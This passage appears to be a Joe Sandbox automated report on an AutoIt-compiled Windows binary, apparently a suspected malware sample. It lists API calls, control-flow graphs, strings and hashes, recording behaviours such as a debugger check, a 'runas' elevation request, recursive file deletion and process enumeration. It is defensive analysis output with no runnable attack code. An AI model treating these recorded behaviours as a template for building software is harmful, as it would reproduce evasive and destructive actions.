101290->101291 101292 80201 101291->101292 101294 8021b 101291->101294 101293 41821 59 API calls 101292->101293 101293->101294 101294->101286 101295 41a36 59 API calls 101295->101297 101296 44c94 59 API calls 101296->101297 101297->101283 101297->101289 101297->101295 101297->101296 101299 61b70 __write_nolock 101298->101299 101300 508ce GetFullPathNameW 101299->101300 101301 508f0 101300->101301 101302 41821 59 API calls 101301->101302 101303 4309f 101302->101303 101303->101275

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0004526C
                                              • IsDebuggerPresent.KERNEL32 ref: 0004527E
                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 000452E6
                                                • Part of subcall function 00041821: _memmove.LIBCMT ref: 0004185B
                                                • Part of subcall function 0003BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0003BC07
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00045366
                                              • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 00080B2E
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00080B66
                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,000E6D10), ref: 00080BE9
                                              • ShellExecuteW.SHELL32(00000000), ref: 00080BF0
                                                • Part of subcall function 0004514C: GetSysColorBrush.USER32(0000000F), ref: 00045156
                                                • Part of subcall function 0004514C: LoadCursorW.USER32(00000000,00007F00), ref: 00045165
                                                • Part of subcall function 0004514C: LoadIconW.USER32(00000063), ref: 0004517C
                                                • Part of subcall function 0004514C: LoadIconW.USER32(000000A4), ref: 0004518E
                                                • Part of subcall function 0004514C: LoadIconW.USER32(000000A2), ref: 000451A0
                                                • Part of subcall function 0004514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000451C6
                                                • Part of subcall function 0004514C: RegisterClassExW.USER32(?), ref: 0004521C
                                                • Part of subcall function 000450DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00045109
                                                • Part of subcall function 000450DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0004512A
                                                • Part of subcall function 000450DB: ShowWindow.USER32(00000000), ref: 0004513E
                                                • Part of subcall function 000450DB: ShowWindow.USER32(00000000), ref: 00045147
                                                • Part of subcall function 000459D3: _memset.LIBCMT ref: 000459F9
                                                • Part of subcall function 000459D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00045A9E
                                              Strings
                                              • runas, xrefs: 00080BE4
                                              • AutoIt, xrefs: 00080B23
                                              • It is a violation of the AutoIt EULA to attempt to reverse user this program., xrefs: 00080B28
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                              • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                                              • API String ID: 529118366-2030392706
                                              • Opcode ID: 6f4b776794a48943217f5b5964f9892097b85a282feeefa6eedde7bf19bf5797
                                              • Instruction ID: cc54c018d790442f152c9024b164de237585e273a6be392f5ba4216274634fb7
                                              • Opcode Fuzzy Hash: 6f4b776794a48943217f5b5964f9892097b85a282feeefa6eedde7bf19bf5797
                                              • Instruction Fuzzy Hash: D65125B0A0824CAFEF51ABB0DC46EFD7B78AF05341F104075F655621A3CBB85A45EB26

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1312 9fa36-9fa8f call 41a36 call 41900 FindFirstFileW 1317 9fb95-9fb9f FindClose call 41cb6 1312->1317 1318 9fa95-9fa98 1312->1318 1321 9fba4-9fbb4 call 41cb6 1317->1321 1320 9fa9b-9faa6 call 352b0 1318->1320 1326 9faac-9faaf 1320->1326 1327 9fb90 1320->1327 1329 9fabb-9fad0 call 5377c 1326->1329 1330 9fab1-9fab9 Sleep 1326->1330 1328 9fb92 1327->1328 1328->1317 1333 9fb76-9fb88 FindNextFileW 1329->1333 1334 9fad6-9faeb call 5377c 1329->1334 1330->1320 1333->1320 1336 9fb8e 1333->1336 1334->1333 1338 9faf1-9fb13 call 41c9c call 41900 1334->1338 1336->1328 1343 9fb53-9fb6d 1338->1343 1344 9fb15-9fb19 1338->1344 1343->1333 1345 9fb6f-9fb72 1343->1345 1346 9fb1b-9fb1e 1344->1346 1347 9fb22-9fb26 1344->1347 1345->1333 1346->1347 1347->1333 1348 9fb28-9fb4f call 41900 call 9fa36 1347->1348 1348->1328 1353 9fb51 1348->1353 1353->1333
                                              APIs
                                                • Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77
                                              • FindFirstFileW.KERNELBASE(?,?,*.*,?,?,00000000,00000000), ref: 0009FA83
                                              • FindClose.KERNELBASE(00000000), ref: 0009FB96
                                                • Part of subcall function 000352B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000352E6
                                              • Sleep.KERNEL32(0000000A), ref: 0009FAB3
                                              • _wcscmp.LIBCMT ref: 0009FAC7
                                              • _wcscmp.LIBCMT ref: 0009FAE2
                                              • FindNextFileW.KERNELBASE(?,?), ref: 0009FB80
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                              • String ID: *.*
                                              • API String ID: 2185952417-438819550
                                              • Opcode ID: 263f337d6b51c261d673e71e57882468a7cb92584b635ecc4953bc8d5fa5b2ae
                                              • Instruction ID: 6ee4187b6d7b06a607b83db17fa824b95b2a3aca2973cce78d662c0768ca6e4c
                                              • Opcode Fuzzy Hash: 263f337d6b51c261d673e71e57882468a7cb92584b635ecc4953bc8d5fa5b2ae
                                              • Instruction Fuzzy Hash: C8416EB194021BAFDF54DF64CC59AEEBBB4FF09354F144166E814E22A1EB309E84DB90

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1421 94005-9404c call 41207 * 3 call 50284 call 94fec 1432 9405c-9408d call 50119 FindFirstFileW 1421->1432 1433 9404e-94057 call 41900 1421->1433 1437 940fc-94103 FindClose 1432->1437 1438 9408f-94091 1432->1438 1433->1432 1439 94107-94129 call 41cb6 * 3 1437->1439 1438->1437 1440 94093-94098 1438->1440 1442 9409a-940d5 call 41c9c call 417e0 call 41900 DeleteFileW 1440->1442 1443 940d7-940e9 FindNextFileW 1440->1443 1442->1443 1456 940f3-940fa FindClose 1442->1456 1443->1438 1446 940eb-940f1 1443->1446 1446->1438 1456->1439
                                              APIs
                                                • Part of subcall function 00050284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00042A58,?,00008000), ref: 000502A4
                                                • Part of subcall function 00094FEC: GetFileAttributesW.KERNELBASE(?,00093BFE), ref: 00094FED
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 0009407C
                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 000940CC
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 000940DD
                                              • FindClose.KERNEL32(00000000), ref: 000940F4
                                              • FindClose.KERNEL32(00000000), ref: 000940FD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 2649000838-1173974218
                                              • Opcode ID: 4c3b32040216df228da1e3817917ba34accb1194bb9f933f852d17e8ce5f3ec3
                                              • Instruction ID: 25e3a7ce5635b3fae2996ae7a67a2452747baadd7e1f1dd12c14e9eb14729196
                                              • Opcode Fuzzy Hash: 4c3b32040216df228da1e3817917ba34accb1194bb9f933f852d17e8ce5f3ec3
                                              • Instruction Fuzzy Hash: 8F3180710083859BC710EB60D896CEFB7E8BF95304F440A2DF9E182192DB359A0DD766
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0009416D
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0009417B
                                              • Process32NextW.KERNEL32(00000000,?), ref: 0009419B
                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00094245
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3243318325-0
                                              • Opcode ID: 496250ceaed212ec1e9ba7592efcc82cf5450d256639c8071a5e408d2183246c
                                              • Instruction ID: e2e9a448cb6c1749014cb03005645a2ae281c326cefdc7b426d333801c5b5f22
                                              • Opcode Fuzzy Hash: 496250ceaed212ec1e9ba7592efcc82cf5450d256639c8071a5e408d2183246c
                                              • Instruction Fuzzy Hash: 9B31B1B11083419FD714EF50D885EEFBBE8BF95350F44052DF995C21A2EBB0AA89CB52
                                              APIs
                                                • Part of subcall function 00043740: CharUpperBuffW.USER32(?,000F71DC,00000001,?,00000000,000F71DC,?,000353A5,?,?,?,?), ref: 0004375D
                                              • _memmove.LIBCMT ref: 0003B68A
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper_memmove
                                              • String ID:
                                              • API String ID: 2819905725-0
                                              • Opcode ID: 79663cd4dd6116227b21b86a6abc0bb8804a3ddf2098712b02ef2c90754bada8
                                              • Instruction ID: 6998bc181c912a68e95c9c9e84be10b2ddfe7f35d7d8161f7b824191d3fc7be0
                                              • Opcode Fuzzy Hash: 79663cd4dd6116227b21b86a6abc0bb8804a3ddf2098712b02ef2c90754bada8
                                              • Instruction Fuzzy Hash: 1EA28A70A087418FD762CF14C480B6AB7E9FF84308F14896DE99A8B362D775ED45CB92
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,0007FC86), ref: 0009495A
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 0009496B
                                              • FindClose.KERNEL32(00000000), ref: 0009497B
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: FileFind$AttributesCloseFirst
                                              • String ID:
                                              • API String ID: 48322524-0
                                              • Opcode ID: 74a356c047acba84dda45e59b66cec52858f4338e865bf229d759114cf677542
                                              • Instruction ID: bea8a3fe8ed0cd6cdeeb7c8df901af44d152f6bbe0f61cbca48b773f7cc3c8e4
                                              • Opcode Fuzzy Hash: 74a356c047acba84dda45e59b66cec52858f4338e865bf229d759114cf677542
                                              • Instruction Fuzzy Hash: 60E0DF31820506EBA6106778EC0DCEAB7AC9F07339F100705F835C21E0EB749944A696
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ac48f682114477f5669112b58c3291e1c2db94f11074634d9d85d2ecc9a4371d
                                              • Instruction ID: 177faecc63496f757d5c2417bc001c21dbc3838deecf26b20101c500b1e873f8
                                              • Opcode Fuzzy Hash: ac48f682114477f5669112b58c3291e1c2db94f11074634d9d85d2ecc9a4371d
                                              • Instruction Fuzzy Hash: 8522AE74E04206DFDB65DF58C480BAEB7F8FF45300F148169E84AAB392D7B4A985CB91
                                              APIs
                                              • timeGetTime.WINMM ref: 0003BF57
                                                • Part of subcall function 000352B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000352E6
                                              • Sleep.KERNEL32(0000000A,?,?), ref: 000736B5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: MessagePeekSleepTimetime
                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                              • API String ID: 1792118007-922114024
                                              • Opcode ID: c2cfddac7f5f385a2e1ae090f5237b36d25157020a3d5792f648e0fa9a09ba55
                                              • Instruction ID: e695c5a997f26f4fec94bfa890076dfd5ed45b617d871c44fd025b4786110e34
                                              • Opcode Fuzzy Hash: c2cfddac7f5f385a2e1ae090f5237b36d25157020a3d5792f648e0fa9a09ba55
                                              • Instruction Fuzzy Hash: 45C2C270A08341DFE729DF24C884BAEB7E5BF84304F14891DF58A972A2CB75E944DB46

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 567 50429-504c1 call 44bdd * 2 call 41c9c * 2 call 41821 call 41207 * 3 584 504c7-504cb 567->584 585 863f4-86400 call 56cbd 567->585 587 86408-8640e call 8b8b6 584->587 588 504d1-504d4 584->588 585->587 590 8641a-86426 call 41609 587->590 588->590 591 504da-504dd 588->591 599 86728-8672c 590->599 600 8642c-8643c call 41609 590->600 591->590 593 504e3-50508 GetForegroundWindow call 503f8 call 31307 591->593 610 50509-5052c call 41cb6 * 3 593->610 602 8673a-8673d 599->602 603 8672e-86735 call 41c9c 599->603 600->599 613 86442-86450 600->613 607 8673f 602->607 608 86746-86753 602->608 603->602 607->608 611 86765-86769 608->611 612 86755-86763 call 41aa4 CharUpperBuffW 608->612 614 8676b-8676e 611->614 615 86780-86789 611->615 612->611 618 86454-8646c call 8aabc 613->618 614->615 621 86770-8677e call 41aa4 CharUpperBuffW 614->621 622 8679a EnumWindows 615->622 623 8678b-86798 GetDesktopWindow EnumChildWindows 615->623 618->599 629 86472-86482 call 50d17 618->629 621->615 627 867a0-867bf call 8b81a call 44bdd 622->627 623->627 644 867cf 627->644 645 867c1-867ca call 503f8 627->645 639 86708-86718 call 50d17 629->639 640 86488-86498 call 50d17 629->640 649 8671a-86720 639->649 650 86700-86703 639->650 651 866ee-866fe call 50d17 640->651 652 8649e-864ae call 50d17 640->652 645->644 649->610 654 86726 649->654 651->650 659 866cf-866d5 GetForegroundWindow 651->659 660 866aa-866c3 call 95db0 IsWindow 652->660 661 864b4-864c4 call 50d17 652->661 657 866e1-866e5 654->657 657->651 663 866d6-866df call 503f8 659->663 660->610 668 866c9-866cd 660->668 670 864e5-864f5 call 50d17 661->670 671 864c6-864cb 661->671 663->657 668->663 679 86506-86516 call 50d17 670->679 680 864f7-86501 670->680 673 8669a-8669c 671->673 674 864d1-864e3 call 410f4 671->674 676 866a4-866a5 673->676 681 86528-86534 call 41138 674->681 676->610 687 86518-86525 call 410f4 679->687 688 86542-86552 call 50d17 679->688 682 86673-8667d call 41c9c 680->682 694 8653a-8653d 681->694 695 8669e-866a0 681->695 693 86691-86695 682->693 687->681 698 86570-86580 call 50d17 688->698 699 86554-8656b call 537ba 688->699 693->618 694->693 695->676 704 8659e-865ae call 50d17 698->704 705 86582-86599 call 537ba 698->705 699->693 710 865cc-865dc call 50d17 704->710 711 865b0-865c7 call 537ba 704->711 705->693 716 865fa-8660a call 50d17 710->716 717 865de-865f5 call 537ba 710->717 711->693 722 8660c-86620 call 537ba 716->722 723 86622-86632 call 50d17 716->723 717->693 722->693 728 86650-86660 call 50d17 723->728 729 86634-86644 call 50d17 723->729 735 8667f-8668f call 8aa43 728->735 736 86662-86667 728->736 729->650 734 8664a-8664e 729->734 734->693 735->650 735->693 737 86669-86670 736->737 738 866a2 736->738 737->682 738->676
                                              APIs
                                                • Part of subcall function 00041821: _memmove.LIBCMT ref: 0004185B
                                              • GetForegroundWindow.USER32(000C0980,?,?,?,?,?), ref: 000504E3
                                              • IsWindow.USER32(?), ref: 000866BB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Window$Foreground_memmove
                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                              • API String ID: 3828923867-1919597938
                                              • Opcode ID: 6a1aeb3679ecb56b4deabdccea4abe3f305f68d05f09b24359f3d9000eee0084
                                              • Instruction ID: 3bb4af69b2edec76f8dc52c7bcec08915e20341cf2114cd4239bf19b7a317001
                                              • Opcode Fuzzy Hash: 6a1aeb3679ecb56b4deabdccea4abe3f305f68d05f09b24359f3d9000eee0084
                                              • Instruction Fuzzy Hash: D4D1E270108642DFCB54FF20C9819EEBBB4BF55344F104A29F895572A2DB31F9A9CB92

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 741 8ba6d-8ba96 743 8ba98-8ba9a 741->743 744 8ba9e-8baa2 741->744 743->744 745 8bad3-8bad7 744->745 746 8baa4-8bacb GetClassNameW call 5377c 744->746 748 8badd-8baf4 GetWindowTextW 745->748 749 8bb92-8bb96 745->749 761 8bacd 746->761 762 8bace-8bacf 746->762 750 8bb0d-8bb15 748->750 751 8baf6-8bb07 call 52e2c CharUpperBuffW 748->751 752 8bb98-8bbd9 GetWindowTextW call 41a36 call 411ea call 41cb6 call 8fb5f 749->752 753 8bc13-8bc17 749->753 756 8bb43-8bb53 call 53892 750->756 757 8bb17-8bb18 750->757 751->750 831 8bc0a-8bc0f 752->831 832 8bbdb-8bbdf 752->832 758 8bc19-8bc5a GetClassNameW call 41a36 call 411ea call 41cb6 call 8fb5f 753->758 759 8bc62-8bc66 753->759 781 8bb56-8bb58 756->781 764 8bb1a-8bb1b 757->764 765 8bb2e-8bb3f call 53baa 757->765 833 8bc5c 758->833 834 8bc5d-8bc61 758->834 766 8bc68-8bc6a 759->766 767 8bc7c-8bc85 759->767 761->762 762->745 771 8bb5b-8bb5f 764->771 772 8bb1d-8bb2c call 5377c 764->772 765->771 801 8bb41 765->801 773 8bc7b 766->773 774 8bc6c-8bc78 call 8bd40 766->774 777 8bcf2-8bcf5 767->777 778 8bc87-8bc9a GetWindowRect 767->778 782 8bb8d-8bb8e 771->782 783 8bb61-8bb87 GetClassNameW call 5377c 771->783 772->781 773->767 774->773 811 8bc7a 774->811 788 8bd11-8bd13 777->788 789 8bcf7-8bcf9 777->789 790 8bcaa-8bcb4 778->790 791 8bc9c-8bca6 778->791 781->771 793 8bb5a 781->793 782->749 783->782 821 8bb89 783->821 796 8bd34-8bd36 788->796 797 8bd15-8bd32 call 31307 788->797 803 8bcfb-8bd0d 789->803 804 8bd10 789->804 794 8bcc0-8bcc6 790->794 795 8bcb6-8bcbc 790->795 805 8bca8 791->805 806 8bca9 791->806 793->771 815 8bcc8-8bcd6 794->815 816 8bcda-8bce0 794->816 813 8bcbe 795->813 814 8bcbf 795->814 810 8bd37-8bd3d 796->810 797->810 801->793 803->804 818 8bd0f 803->818 804->788 805->806 806->790 811->773 813->814 814->794 822 8bcd8 815->822 823 8bcd9 815->823 816->777 824 8bce2-8bcee 816->824 818->804 821->782 822->823 823->816 828 8bcf0 824->828 829 8bcf1 824->829 828->829 829->777 831->753 835 8bc09 832->835 836 8bbe1-8bc07 GetClassNameW call 5377c 832->836 833->834 834->759 835->831 836->831 836->835
                                              APIs
                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0008BAB1
                                              • _wcscmp.LIBCMT ref: 0008BAC2
                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0008BAEA
                                              • CharUpperBuffW.USER32(?,00000000), ref: 0008BB07
                                              • _wcscmp.LIBCMT ref: 0008BB25
                                              • _wcsstr.LIBCMT ref: 0008BB36
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0008BB6E
                                              • _wcscmp.LIBCMT ref: 0008BB7E
                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0008BBA5
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0008BBEE
                                              • _wcscmp.LIBCMT ref: 0008BBFE
                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0008BC26
                                              • GetWindowRect.USER32(00000004,?), ref: 0008BC8F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                              • String ID: @$ThumbnailClass
                                              • API String ID: 1788623398-1539354611
                                              • Opcode ID: f90a7facc3e4401d2e63c05ec4259ad60ba2b137017a65bc1ea65dd7559ab210
                                              • Instruction ID: c5d6fb88e470e76f68b6e347abac97a3e4e25cf2cd10d68d93396bcaf88bb0bf
                                              • Opcode Fuzzy Hash: f90a7facc3e4401d2e63c05ec4259ad60ba2b137017a65bc1ea65dd7559ab210
                                              • Instruction Fuzzy Hash: DD81AF710083099BDB54EF14C885FAA7BE8FF44314F048569FDC99A096EB74ED49CB61

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00033444
                                              • RegisterClassExW.USER32(00000030), ref: 0003346E
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0003347F
                                              • InitCommonControlsEx.COMCTL32(?), ref: 0003349C
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000334AC
                                              • LoadIconW.USER32(000000A9), ref: 000334C2
                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000334D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 2914291525-1005189915
                                              • Opcode ID: bed41c3f4d31488a35fb6cdb79c0be47fe214828f326f8e2a744da3afa986826
                                              • Instruction ID: 5ed245dc6bdb56ec7ef52ef029dcd1bc03fa815b46c8be4302f532e66ebe06b1
